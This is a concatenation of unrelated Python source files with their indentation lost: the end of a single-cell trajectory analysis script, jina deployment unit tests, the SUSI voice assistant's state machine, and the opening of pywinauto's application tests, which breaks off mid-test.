Bcell_marker_gene_list = ['Igll1']#, 'Myc', 'Slc7a5', 'Ldha', 'Foxo1', 'Lig4','Sp7','Zfp629'] #irf4 down-up
df_ = pd.DataFrame(adata_counts_unfiltered.X)
df_.columns = [i for i in adata_counts_unfiltered.var_names]
df_magic = p0.do_magic(df_, magic_steps=3, gene_list=Bcell_marker_gene_list)
for gene_name in Bcell_marker_gene_list:
#loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
subset_ = df_magic[gene_name].values
p1.get_gene_expression(subset_, title_gene=gene_name + ' (VIA MAGIC)')
#magic_ad = adata_counts_unfiltered.X[:, loc_gata]
#p1.get_gene_expression(magic_ad, gene_name)
n_downsample = 100
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=900)
np.random.seed(2357)
#idx = np.random.choice(a=np.arange(0, len(labels)), size=len(labels), replace=False, p=None)
idx = np.arange(0, len(labels))
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
true_label = list((np.asarray(true_label)[idx]))
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov[idx]))
#embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
graph_embedding = p0.knngraph_visual(input_via[idx, 0:5], knn_umap =10, downsampled=True)
embedding_hnsw = p0.run_umap_hnsw(input_via[idx, 0:5], graph_embedding)
#embedding = embedding_hnsw
#loc0 = np.where(np.asarray(true_label)==0)[0]
#for item in loc0:
#print(item, 'at', embedding[item,:])
print('tsne downsampled size', embedding.shape)
else:
# embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][:,0:5]) # (adata_counts.obsm['X_pca'])
print('tsne input size', adata_counts.obsm['X_pca'].shape)
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'])
idx = np.arange(0, len(labels)) # np.random.randint(len(labels), size=len(labels))
sc_pt_markov = p1.single_cell_pt_markov
# embedding = umap.UMAP(random_state=42, n_neighbors=15, init=umap_init).fit_transform( adata_counts.obsm['X_pca'][:, 0:5])
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
draw_trajectory_gams(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p1.revised_super_terminal_clusters,
sub_terminal_clusters=p1.terminal_clusters,
title_str='Markov Hitting Times (Gams)', ncomp=ncomps)
plt.show()
'''
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Markov Hitting Times (polyfit)', ncomp=ncomps)
plt.show()
'''
#draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main():
dataset = 'Human'#,'Toy'#,'Bcell' # 'Toy'
if dataset == 'Human':
main_Human(ncomps=10, knn=30, p0_random_seed=12, run_palantir_func=False)
elif dataset == 'Bcell':
main_Bcell(ncomps=100, knn=20, random_seed=4 ) #0 is good
else:
main_Toy(ncomps =180, knn=30, random_seed = 42)
if __name__ == '__main__':
main()
|
test_deployments.py
|
import json
import os
from multiprocessing import Process
import pytest
from jina.clients.request import request_generator
from jina.enums import PollingType
from jina.parsers import set_gateway_parser
from jina.parsers import set_deployment_parser
from jina.orchestrate.deployments import Deployment
from jina import (
Document,
DocumentArray,
Executor,
__default_executor__,
__default_host__,
requests,
)
from jina.serve.networking import GrpcConnectionPool
from tests.unit.test_helper import MyDummyExecutor
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope='function')
def pod_args():
args = [
'--name',
'test',
'--replicas',
'2',
'--host',
__default_host__,
]
return set_deployment_parser().parse_args(args)
@pytest.fixture
def graph_description():
return '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
@pytest.fixture(scope='function')
def pod_args_singleton():
args = [
'--name',
'test2',
'--uses-before',
__default_executor__,
'--replicas',
'1',
'--host',
__default_host__,
]
return set_deployment_parser().parse_args(args)
def test_name(pod_args):
with Deployment(pod_args) as pod:
assert pod.name == 'test'
def test_host(pod_args):
with Deployment(pod_args) as pod:
assert pod.host == __default_host__
assert pod.head_host == __default_host__
def test_is_ready(pod_args):
with Deployment(pod_args) as pod:
assert pod.is_ready is True
def test_equal(pod_args, pod_args_singleton):
pod1 = Deployment(pod_args)
pod2 = Deployment(pod_args)
assert pod1 == pod2
pod1.close()
pod2.close()
# test not equal
pod1 = Deployment(pod_args)
pod2 = Deployment(pod_args_singleton)
assert pod1 != pod2
pod1.close()
pod2.close()
class ChildDummyExecutor(MyDummyExecutor):
pass
class ChildDummyExecutor2(MyDummyExecutor):
pass
def test_uses_before_after(pod_args):
pod_args.replicas = 1
pod_args.uses_before = 'MyDummyExecutor'
pod_args.uses_after = 'ChildDummyExecutor2'
pod_args.uses = 'ChildDummyExecutor'
with Deployment(pod_args) as pod:
assert (
pod.head_args.uses_before_address
== f'{pod.uses_before_args.host}:{pod.uses_before_args.port_in}'
)
assert (
pod.head_args.uses_after_address
== f'{pod.uses_after_args.host}:{pod.uses_after_args.port_in}'
)
assert pod.num_pods == 4
def test_mermaid_str_no_error(pod_args):
pod_args.replicas = 3
pod_args.uses_before = 'MyDummyExecutor'
pod_args.uses_after = 'ChildDummyExecutor2'
pod_args.uses = 'ChildDummyExecutor'
pod = Deployment(pod_args)
print(pod._mermaid_str)
@pytest.mark.slow
@pytest.mark.parametrize('replicas', [1, 2, 4])
def test_pod_context_replicas(replicas):
args_list = ['--replicas', str(replicas)]
args = set_deployment_parser().parse_args(args_list)
with Deployment(args) as bp:
if replicas == 1:
assert bp.num_pods == 2
else:
# count head
assert bp.num_pods == replicas + 1
Deployment(args).start().close()
@pytest.mark.slow
@pytest.mark.parametrize('shards', [1, 2, 4])
def test_pod_context_shards_replicas(shards):
args_list = ['--replicas', str(3)]
args_list.extend(['--shards', str(shards)])
args = set_deployment_parser().parse_args(args_list)
with Deployment(args) as bp:
assert bp.num_pods == shards * 3 + 1
Deployment(args).start().close()
class AppendNameExecutor(Executor):
def __init__(self, runtime_args, *args, **kwargs):
super().__init__(*args, **kwargs)
self.name = runtime_args['name']
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.name)))
return docs
@pytest.mark.slow
def test_pod_activates_replicas():
args_list = ['--replicas', '3']
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendNameExecutor'
with Deployment(args) as pod:
assert pod.num_pods == 4
response_texts = set()
# replicas are used in a round robin fashion, so sending 3 requests should hit each one time
for _ in range(3):
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
assert 4 == len(response_texts)
assert all(text in response_texts for text in ['0', '1', '2', 'client'])
Deployment(args).start().close()
class AppendParamExecutor(Executor):
def __init__(self, param, *args, **kwargs):
super().__init__(*args, **kwargs)
self.param = param
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.param)))
return docs
@pytest.mark.slow
@pytest.mark.parametrize('shards', [1, 2])
def test_pod_rolling_update(shards):
args_list = ['--replicas', '7']
args_list.extend(['--shards', str(shards)])
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendParamExecutor'
args.uses_with = {'param': 10}
with Deployment(args) as pod:
async def run_async_test():
response_texts = await _send_requests(pod)
assert 2 == len(response_texts)
assert all(text in response_texts for text in ['10', 'client'])
await pod.rolling_update(uses_with={'param': 20})
response_texts = await _send_requests(pod)
assert 2 == len(response_texts)
assert all(text in response_texts for text in ['20', 'client'])
assert '10' not in response_texts
p = Process(target=run_async_test)
p.start()
p.join()
assert p.exitcode == 0
Deployment(args).start().close()
async def _send_requests(pod):
response_texts = set()
for _ in range(3):
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
return response_texts
class AppendShardExecutor(Executor):
def __init__(self, runtime_args, *args, **kwargs):
super().__init__(*args, **kwargs)
self.shard_id = runtime_args['shard_id']
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.shard_id)))
return docs
def test_pod_naming_with_shards():
args = set_deployment_parser().parse_args(
[
'--name',
'pod',
'--shards',
'2',
'--replicas',
'3',
]
)
with Deployment(args) as pod:
assert pod.head_pod.name == 'pod/head'
assert pod.shards[0].args[0].name == 'pod/shard-0/rep-0'
assert pod.shards[0].args[1].name == 'pod/shard-0/rep-1'
assert pod.shards[0].args[2].name == 'pod/shard-0/rep-2'
assert pod.shards[1].args[0].name == 'pod/shard-1/rep-0'
assert pod.shards[1].args[1].name == 'pod/shard-1/rep-1'
assert pod.shards[1].args[2].name == 'pod/shard-1/rep-2'
@pytest.mark.slow
def test_pod_activates_shards():
args_list = ['--replicas', '3']
args_list.extend(['--shards', '3'])
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendShardExecutor'
args.polling = PollingType.ALL
with Deployment(args) as pod:
assert pod.num_pods == 3 * 3 + 1
response_texts = set()
# replicas are used in a round robin fashion, so sending 3 requests should hit each one time
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
assert 4 == len(response.response.docs.texts)
assert 4 == len(response_texts)
assert all(text in response_texts for text in ['0', '1', '2', 'client'])
Deployment(args).start().close()
@pytest.mark.slow
@pytest.mark.skipif(
'GITHUB_WORKFLOW' in os.environ,
reason='for unknown reason, this test is flaky on Github action, '
'but locally it SHOULD work fine',
)
@pytest.mark.parametrize(
'protocol, runtime_cls',
[
('grpc', 'GRPCGatewayRuntime'),
],
)
def test_gateway_pod(protocol, runtime_cls, graph_description):
args = set_gateway_parser().parse_args(
[
'--graph-description',
graph_description,
'--deployments-addresses',
'{"pod0": ["0.0.0.0:1234"]}',
'--protocol',
protocol,
]
)
with Deployment(args) as p:
assert len(p.all_args) == 1
assert p.all_args[0].runtime_cls == runtime_cls
Deployment(args).start().close()
def test_pod_naming_with_replica():
args = set_deployment_parser().parse_args(['--name', 'pod', '--replicas', '2'])
with Deployment(args) as bp:
assert bp.head_pod.name == 'pod/head'
assert bp.shards[0]._pods[0].name == 'pod/rep-0'
assert bp.shards[0]._pods[1].name == 'pod/rep-1'
def test_pod_args_remove_uses_ba():
args = set_deployment_parser().parse_args([])
with Deployment(args) as p:
assert p.num_pods == 2
args = set_deployment_parser().parse_args(
['--uses-before', __default_executor__, '--uses-after', __default_executor__]
)
with Deployment(args) as p:
assert p.num_pods == 2
args = set_deployment_parser().parse_args(
[
'--uses-before',
__default_executor__,
'--uses-after',
__default_executor__,
'--replicas',
'2',
]
)
with Deployment(args) as p:
assert p.num_pods == 3
@pytest.mark.parametrize('replicas', [1])
@pytest.mark.parametrize(
'upload_files',
[[os.path.join(cur_dir, __file__), os.path.join(cur_dir, '__init__.py')]],
)
@pytest.mark.parametrize(
'uses, uses_before, uses_after, py_modules, expected',
[
(
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
'',
'',
[
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '__init__.py'),
],
[
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, __file__),
os.path.join(cur_dir, '__init__.py'),
],
),
(
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
[
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
],
[
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, __file__),
os.path.join(cur_dir, '__init__.py'),
],
),
(
'non_existing1.yml',
'non_existing3.yml',
'non_existing4.yml',
['non_existing1.py', 'non_existing2.py'],
[os.path.join(cur_dir, __file__), os.path.join(cur_dir, '__init__.py')],
),
],
)
def test_pod_upload_files(
replicas,
upload_files,
uses,
uses_before,
uses_after,
py_modules,
expected,
):
args = set_deployment_parser().parse_args(
[
'--uses',
uses,
'--uses-before',
uses_before,
'--uses-after',
uses_after,
'--py-modules',
*py_modules,
'--upload-files',
*upload_files,
'--replicas',
str(replicas),
]
)
pod = Deployment(args)
for k, v in pod.pod_args.items():
if k in ['head', 'tail']:
if v:
pass
# assert sorted(v.upload_files) == sorted(expected)
elif v is not None and k == 'pods':
for shard_id in v:
for pod in v[shard_id]:
print(sorted(pod.upload_files))
print(sorted(expected))
assert sorted(pod.upload_files) == sorted(expected)
class DynamicPollingExecutor(Executor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@requests(on='/any')
def any(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/all')
def all(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/no_polling')
def no_polling(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_with_config(polling):
endpoint_polling = {'/any': PollingType.ANY, '/all': PollingType.ALL, '*': polling}
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutor',
'--shards',
str(2),
'--polling',
json.dumps(endpoint_polling),
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/all'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/all',
)
assert len(response.docs) == 1 + 2 # 1 source doc + 2 docs added by each shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/any'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/any',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/no_polling'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/no_polling',
)
if polling == 'any':
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
else:
assert (
len(response.docs) == 1 + 2
) # 1 source doc + 1 doc added by the two shards
class DynamicPollingExecutorDefaultNames(Executor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@requests(on='/index')
def index(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/search')
def search(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_default_config(polling):
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutorDefaultNames',
'--shards',
str(2),
'--polling',
polling,
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/search'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/search',
)
assert len(response.docs) == 1 + 2
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/index'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/index',
)
assert len(response.docs) == 1 + 1
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_overwrite_default_config(polling):
endpoint_polling = {'/search': PollingType.ANY, '*': polling}
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutorDefaultNames',
'--shards',
str(2),
'--polling',
json.dumps(endpoint_polling),
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/search'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/search',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/index'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/index',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
def _create_test_data_message(endpoint='/'):
return list(request_generator(endpoint, DocumentArray([Document(text='client')])))[
0
]
@pytest.mark.parametrize('num_shards, num_replicas', [(1, 1), (1, 2), (2, 1), (3, 2)])
def test_pod_remote_pod_replicas_host(num_shards, num_replicas):
args = set_deployment_parser().parse_args(
[
'--shards',
str(num_shards),
'--replicas',
str(num_replicas),
'--host',
__default_host__,
]
)
assert args.host == __default_host__
with Deployment(args) as pod:
assert pod.num_pods == num_shards * num_replicas + 1
pod_args = dict(pod.pod_args['pods'])
for k, replica_args in pod_args.items():
assert len(replica_args) == num_replicas
for replica_arg in replica_args:
assert replica_arg.host == __default_host__
|
susi_state_machine.py
|
"""This module declares the SUSI State Machine Class and Component Class.
The SUSI State Machine works on the concept of Finite State Machine.
"""
import time
import logging
from threading import Thread
from urllib.parse import urljoin
import requests
import json_config
from speech_recognition import Recognizer, Microphone
from requests.exceptions import ConnectionError
import susi_python as susi
from .busy_state import BusyState
from .error_state import ErrorState
from .idle_state import IdleState
from .recognizing_state import RecognizingState
from ..scheduler import ActionScheduler
logger = logging.getLogger(__name__)
class Components:
"""Common components accessible by each state of the the SUSI state Machine.
"""
def __init__(self, renderer=None):
try:
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
except ImportError:
logger.warning("This device doesn't have GPIO port")
except RuntimeError as e:
logger.error(e)
pass
thread1 = Thread(target=self.server_checker, name="Thread1")
thread1.daemon = True
thread1.start()
recognizer = Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = 1000
self.recognizer = recognizer
self.microphone = Microphone()
self.susi = susi
self.renderer = renderer
self.server_url = "https://127.0.0.1:4000"
self.action_schduler = ActionScheduler()
self.action_schduler.start()
try:
res = requests.get('http://ip-api.com/json').json()
self.susi.update_location(
longitude=res['lon'], latitude=res['lat'],
country_name=res['country'], country_code=res['countryCode'])
except ConnectionError as e:
logger.error(e)
self.config = json_config.connect('config.json')
if self.config['usage_mode'] == 'authenticated':
try:
susi.sign_in(email=self.config['login_credentials']['email'],
password=self.config['login_credentials']['password'])
except Exception as e:
logger.error('Some error occurred in login. Check you login details in config.json.\n%s', e)
if self.config['hotword_engine'] == 'Snowboy':
from ..hotword_engine.snowboy_detector import SnowboyDetector
self.hotword_detector = SnowboyDetector()
else:
from ..hotword_engine.sphinx_detector import PocketSphinxDetector
self.hotword_detector = PocketSphinxDetector()
if self.config['WakeButton'] == 'enabled':
logger.info("Susi has the wake button enabled")
if self.config['Device'] == 'RaspberryPi':
logger.info("Susi runs on a RaspberryPi")
from ..hardware_components import RaspberryPiWakeButton
self.wake_button = RaspberryPiWakeButton()
else:
logger.warning("Susi is not running on a RaspberryPi")
self.wake_button = None
else:
logger.warning("Susi has the wake button disabled")
self.wake_button = None
def server_checker(self):
response_one = None
test_params = {
'q': 'Hello',
'timezoneOffset': int(time.timezone / 60)
}
while response_one is None:
try:
logger.debug("checking for local server")
url = urljoin(self.server_url, '/susi/chat.json')
response_one = requests.get(url, test_params).result()
api_endpoint = self.server_url
susi.use_api_endpoint(api_endpoint)
except AttributeError:
time.sleep(10)
continue
except ConnectionError:
time.sleep(10)
continue
class SusiStateMachine(Thread):
"""SUSI State Machine works on the concept of Finite State Machine. Each step of working of this app is divided into
a state of the State Machine. Each state can transition into one of the allowed states and pass some information
to other states as PAYLOAD. Upon Error, transition should happen to Error State and after speaking the correct error
message, the machine transitions to the Idle State.
"""
def __init__(self, renderer=None):
super().__init__()
components = Components(renderer)
self.__idle_state = IdleState(components)
self.__recognizing_state = RecognizingState(components)
self.__busy_state = BusyState(components)
self.__error_state = ErrorState(components)
self.current_state = self.__idle_state
self.__idle_state.allowedStateTransitions = \
{'recognizing': self.__recognizing_state, 'error': self.__error_state, 'busy': self.__busy_state}
self.__recognizing_state.allowedStateTransitions = \
{'busy': self.__busy_state, 'error': self.__error_state}
self.__busy_state.allowedStateTransitions = \
{'idle': self.__idle_state, 'error': self.__error_state, 'recognizing': self.__recognizing_state}
self.__error_state.allowedStateTransitions = \
{'idle': self.__idle_state}
def run(self):
self.current_state.on_enter(payload=None)
|
test_application.py
|
# GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=C0301
#pylint: disable-msg=F0401
#pylint: disable-msg=W0142
"""Tests for application.py"""
import sys
import os
import unittest
import time
#import pprint
#import pdb
import warnings
from threading import Thread
import ctypes
import mock
sys.path.append(".")
from pywinauto import Desktop
from pywinauto import win32defines
from pywinauto import application
from pywinauto.controls import hwndwrapper
from pywinauto.application import Application
from pywinauto.application import WindowSpecification
from pywinauto.application import process_module
from pywinauto.application import process_get_modules
from pywinauto.application import ProcessNotFoundError
from pywinauto.application import AppStartError
from pywinauto.application import AppNotConnected
from pywinauto import findwindows
from pywinauto import findbestmatch
from pywinauto.timings import Timings
from pywinauto.timings import TimeoutError
from pywinauto.timings import WaitUntil
from pywinauto.timings import always_wait_until
from pywinauto.timings import always_wait_until_passes
from pywinauto.timings import timestamp # noqa: E402
from pywinauto.sysinfo import is_x64_Python
from pywinauto.sysinfo import is_x64_OS
from pywinauto.sysinfo import UIA_support
#application.set_timing(1, .01, 1, .01, .05, 0, 0, .1, 0, .01)
# About dialog may take some time to load
# so make sure that we wait for it.
Timings.window_find_timeout = 5
def _notepad_exe():
if is_x64_Python() or not is_x64_OS():
return r"C:\Windows\System32\notepad.exe"
else:
return r"C:\Windows\SysWOW64\notepad.exe"
mfc_samples_folder_32 = mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class ApplicationWarningTestCases(unittest.TestCase):
"""Unit tests for warnings in the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
# Force Display User and Deprecation warnings every time
# Python 3.3+nose/unittest trys really hard to suppress them
for warning in (UserWarning, PendingDeprecationWarning):
warnings.simplefilter('always', warning)
mfc_samples_folder = os.path.join(os.path.dirname(__file__),
r"..\..\apps\MFC_samples")
if is_x64_Python():
self.sample_exe = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"CmnCtrl1.exe")
else:
self.sample_exe = os.path.join(mfc_samples_folder, "CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
def testStartWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
app = Application().start(self.sample_exe_inverted_bitness)
app.kill()
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "64-bit" in str(w[-1].message)
def testConnectWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
app = Application().start(self.sample_exe_inverted_bitness)
# Appveyor misteries...
self.assertEqual(app.is_process_running(), True)
with mock.patch("warnings.warn") as mockWarn:
Application().connect(process=app.process)
app.kill()
args, kw = mockWarn.call_args
assert len(args) == 2
assert "64-bit" in args[0]
assert args[1].__name__ == 'UserWarning'
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
class AdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(AdminTestCases, self).setUp()
cmd = 'powershell -Command "Start-Process {} -Verb RunAs"'.format(self.sample_exe)
self.app = Application().start(cmd, wait_for_idle=False)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(AdminTestCases, self).tearDown()
def test_non_admin_warning(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(title="Common Controls Sample", timeout=20)
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "process has no rights" in str(w[-1].message)
def test_non_admin_click(self):
self.app = Application().connect(title="Common Controls Sample", timeout=20)
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click_input()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.TVS_HASBUTTON.check()
class NonAdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(NonAdminTestCases, self).setUp()
self.app = Application().start(self.sample_exe)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(NonAdminTestCases, self).tearDown()
def test_both_non_admin(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(title="Common Controls Sample", timeout=5)
assert len(w) == 0
def test_both_non_admin_click(self):
self.app = Application().connect(title="Common Controls Sample", timeout=5)
self.app.CommonControlsSample.TVS_HASBUTTON.check()
self.assertEqual(self.app.CommonControlsSample.TVS_HASBUTTON.is_checked(), True)
self.app.CommonControlsSample.OK.click()
self.app.CommonControlsSample.wait_not('visible')
class ApplicationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.prev_warn = warnings.showwarning
def no_warnings(*args, **kwargs): pass
warnings.showwarning = no_warnings
if is_x64_Python() or not is_x64_OS():
self.notepad_subpath = r"system32\notepad.exe"
else:
self.notepad_subpath = r"SysWOW64\notepad.exe"
def tearDown(self):
"""Close the application after tests"""
#self.dlg.SendMessage(win32defines.WM_CLOSE)
warnings.showwarning = self.prev_warn
def test__init__(self):
"""Verify that Application instance is initialized or not"""
self.assertRaises(ValueError, Application, backend='unregistered')
def test_not_connected(self):
"""Verify that it raises when the app is not connected"""
self.assertRaises (AppNotConnected, Application().__getattribute__, 'Hiya')
self.assertRaises (AppNotConnected, Application().__getitem__, 'Hiya')
self.assertRaises (AppNotConnected, Application().window_, title = 'Hiya')
self.assertRaises (AppNotConnected, Application().top_window_,)
def test_start_problem(self):
"""Verify start_ raises on unknown command"""
self.assertRaises (AppStartError, Application().start, 'Hiya')
def test_start(self):
"""test start() works correctly"""
app = Application()
self.assertEqual(app.process, None)
app.start(_notepad_exe())
self.assertNotEqual(app.process, None)
self.assertEqual(app.UntitledNotepad.process_id(), app.process)
notepadpath = os.path.join(os.environ['systemroot'], self.notepad_subpath)
self.assertEqual(str(process_module(app.process)).lower(), str(notepadpath).lower())
app.UntitledNotepad.MenuSelect("File->Exit")
def testStart_bug01(self):
"""On SourceForge forum AppStartError forgot to include %s for application name"""
app = Application()
self.assertEqual(app.process, None)
application.app_start_timeout = 1
app_name = r"I am not * and Application!/\.exe"
try:
app.start(app_name)
except AppStartError as e:
self.assertEquals(app_name in str(e), True)
# def testset_timing(self):
# """Test that set_timing sets the timing correctly"""
# prev_timing = (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# )
# set_timing(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
#
# self.assertEquals(
# (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# ), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10) )
#
# set_timing(*prev_timing)
def test_connect_path(self):
"""Test that connect_() works with a path"""
app1 = Application()
